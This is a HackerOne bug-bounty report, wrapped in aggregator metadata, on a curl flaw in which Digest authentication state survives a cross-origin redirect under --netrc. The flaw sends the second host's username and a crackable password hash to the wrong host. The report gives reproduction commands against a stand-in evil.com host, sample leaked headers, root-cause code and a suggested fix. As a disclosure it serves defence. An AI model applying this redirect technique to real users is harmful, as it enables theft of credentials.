{“lastseen”:”2026-04-19T22:29:41″,”description”:”## Summary\\n\\nWhen curl follows an HTTP redirect from hostA to hostB using `–netrc –digest -L`, Digest authentication state (nonce, realm) from hostA persists and is combined with hostB’s netrc credentials to generate an unsolicited Digest Authorization header sent to hostB. This leaks hostB’s username in cleartext and a password hash computed under the attacker’s chosen nonce, enabling offline password cracking. The root cause is that Digest state is never cleared on redirect, `authhost-\\u003epicked` persists as `CURLAUTH_DIGEST`, and `conn-\\u003ebits.netrc` bypasses `Curl_auth_allowed_to_host()`. This is a variant of CVE-2022-27774 not covered by that fix – NTLM is correctly cleared on new connections (url.c:3373-3378) but Digest is not.\\n\\n## Affected version\\n\\n“`bash\\ncurl 8.20.0-DEV (x86_64-pc-linux-gnu)\\nRelease-Date: [unreleased]\\nProtocols: dict file ftp ftps gopher gophers http https imap imaps …\\nFeatures: alt-svc AsynchDNS brotli GSS-API HSTS HTTP2 HTTP3 …\\n“`\\n\\nTested on current master (commit rc-8_20_0-2), Linux x86_64. Likely affects all versions with `–netrc` + `–digest` + redirect support.\\n\\n## Steps To Reproduce\\n\\n 1. Save PoC script as `poc_digest_leak_crossorigin.py` and run it: `python3 poc_digest_leak_crossorigin.py`\\n\\nThe script starts two HTTP servers (hostA on port 8011, hostB on port 8012), creates a temporary netrc file with credentials for both hosts, and runs curl with `–resolve` to simulate distinct hostnames:\\n\\n“`bash\\ncurl –resolve hosta.evil.com:8011:127.0.0.1 \\\\\\n –resolve hostb.corp.com:8012:127.0.0.1 \\\\\\n –netrc-file \/tmp\/test_netrc \\\\\\n –digest -L \\\\\\n http:\/\/hosta.evil.com:8011\/login\\n“`\\n\\nNetrc file:\\n“`\\nmachine hosta.evil.com\\n login evil_user\\n password evil_pass\\n\\nmachine hostb.corp.com\\n login corporate_admin\\n password S3cretP@ssw0rd!\\n“`\\n\\n 2. Observe the output – hostB receives an unsolicited Digest Authorization header:\\n\\n“`bash\\n[hostA.evil.com] 401 Digest challenge sent\\n[hostA.evil.com] Authenticated, redirecting to hostB\\n\\nVULNERABILITY CONFIRMED: Cross-origin credential leak\\nhostB.corp.com received unsolicited Digest auth:\\n Digest username=\\”corporate_admin\\”, realm=\\”evil-realm\\”,\\n nonce=\\”attacker_controlled_nonce_abc\\”, uri=\\”\/secret\\”,\\n cnonce=\\”b09d5KnvEUHWam89\\”, nc=00000002, qop=auth,\\n response=\\”6e9f04d34189538559a22613f1fe4082\\”\\n\\n LEAKED: hostB username = corporate_admin\\n STALE: realm from hostA = evil-realm\\n STALE: nonce from hostA = attacker_controlled_nonce_abc\\n IMPACT: response hash = MD5(hostB_pass : attacker_nonce : …)\\n“`\\n\\n 3. Run the hash verification PoC to confirm offline cracking: `python3 poc_verify_hash.py`\\n\\nThis proves that knowing the attacker-chosen nonce + leaked hash is sufficient to brute-force the victim’s password offline.\\n\\n### Root cause (three interacting issues)\\n\\n**1. Digest state never cleared on redirect** – `data-\\u003estate.digest` (nonce, realm, cnonce) is only cleaned in `Curl_close()` and `curl_easy_reset()`, never during redirect handling.\\n\\n**2. `authhost-\\u003epicked` persists** – Set to `CURLAUTH_DIGEST` during hostA’s 401 challenge, never reset on redirect. NTLM is correctly cleared at url.c:3373-3378, but Digest is not.\\n\\n**3. `conn-\\u003ebits.netrc` bypasses auth check** – At http.c:842-844:\\n“`c\\nif(Curl_auth_allowed_to_host(data)\\n || conn-\\u003ebits.netrc) \/\/ bypasses cross-origin check\\n result = output_auth_headers(…);\\n“`\\n\\n## Additional information\\n\\nThis is a variant of CVE-2022-27774 (credential leak on redirect). The fix for that CVE added `Curl_auth_allowed_to_host()`, but the `conn-\\u003ebits.netrc` exemption at http.c:842 bypasses it for stateful auth methods. NTLM state is correctly cleared on new connections (url.c:3373-3378) but Digest state is not – this asymmetry indicates an oversight.\\n\\nSuggested fix: Clear Digest state on cross-origin redirect:\\n\\n“`c\\n\/\/ In redirect handling, after host change detected:\\nif(!Curl_url_same_origin(base, href)) {\\n Curl_auth_digest_cleanup(\\u0026data-\\u003estate.digest);\\n data-\\u003estate.authhost.picked = CURLAUTH_NONE;\\n}\\n“`\\n\\n## Impact\\n\\nAn attacker who controls hostA can redirect a curl user to hostB and obtain: (1) hostB’s username in cleartext from the unsolicited Digest header, and (2) a Digest response hash computed with the attacker’s chosen nonce, enabling offline password cracking if the attacker can observe the request to hostB. This bypasses the credential leak protections added for CVE-2022-27774.”,”published”:”2026-04-17T12:29:29″,”modified”:”2026-04-19T21:50:00″,”type”:”hackerone”,”title”:”curl: Digest Auth State Leak on Cross-Origin Redirect via Netrc – Username and Password Hash Sent to Wrong Host”,”source”:””,”references”:””,”id”:”H1:3680038″,”bulletinFamily”:”bugbounty”,”cwe”:null,”cvelist”:[“CVE-2022-27774″],”sourceData”:””,”sourceHref”:””,”cvss”:{“score”:5.7,”severity”:”MEDIUM”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:R\/S:U\/C:H\/I:N\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/hackerone.com\/reports\/3680038″,”category_name”:”News”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-19T22:29:41″,”description”:”## Summary\\n\\nWhen curl follows an HTTP redirect from hostA to hostB using `–netrc –digest -L`, Digest authentication state (nonce, realm) from hostA persists and is…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[6,8,138,12,117,21,13,7,11,5],"class_list":["post-47913","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-cve","tag-cvss","tag-cvss-57","tag-exploit","tag-hackerone","tag-medium","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n